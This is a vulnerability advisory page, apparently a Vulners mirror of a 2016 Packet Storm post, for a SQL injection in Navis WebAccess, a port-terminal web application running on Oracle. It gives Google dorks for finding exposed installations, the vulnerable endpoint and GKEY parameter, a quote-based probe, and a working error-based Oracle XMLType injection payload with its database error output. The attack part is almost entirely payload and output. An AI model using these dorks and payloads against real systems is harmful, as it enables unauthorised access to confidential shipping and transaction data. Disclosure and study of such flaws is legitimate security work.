Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Navis WebAccess SQL Injection

🗓️ 08 Aug 2016 00:00:00Reported by bRpsdType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

Navis WebAccess SQL Injection, Oracle DBMS, Express/All versio

Show more
Code
`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
  
Product -> Navis WebAccess - SQL Injection  
Date -> 8/8/2016  
Author -> bRpsd  
Skype: vegnox  
Vendor HomePage -> http://www.navis.com/  
Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance)  
Product Version -> Express/All  
DBMS -> Oracle  
Tested on > Apache/2.0.54 (Win32)  
  
  
{{ Dorks }}  
  
"Copyright A(c) 2016 Navis, A Zebra Technologies Company"  
"Confidential Information of Navis, A Zebra Technologies Company"  
inurl:GKEY= ext:do  
inurl:/express/secure/Today.jsp  
navis.com webaccess  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
  
  
#############  
|DESCRIPTION|  
#############  
"Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constitiuents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage."  
  
  
  
Vulnerability: SQL Injection  
File: /express/showNotice.do  
Vul Parameter: GKEY  
  
  
================================================================================================  
Test #1  
  
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2'  
  
  
Response Error:  
  
ORA-00933: SQL command not properly ended  
================================================================================================  
  
  
Test #2 => Payload (Proof Of Concept)  
  
http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)  
  
  
Response Error:  
  
ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1  
======================================================================================================================================================================================  
  
~  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Aug 2016 00:00Current
0.7Low risk
Vulners AI Score0.7
navis webaccesssql injectionoracle dbmsexpress/allweb-based applicationreal-time transactionvulnerability
33
.json
Report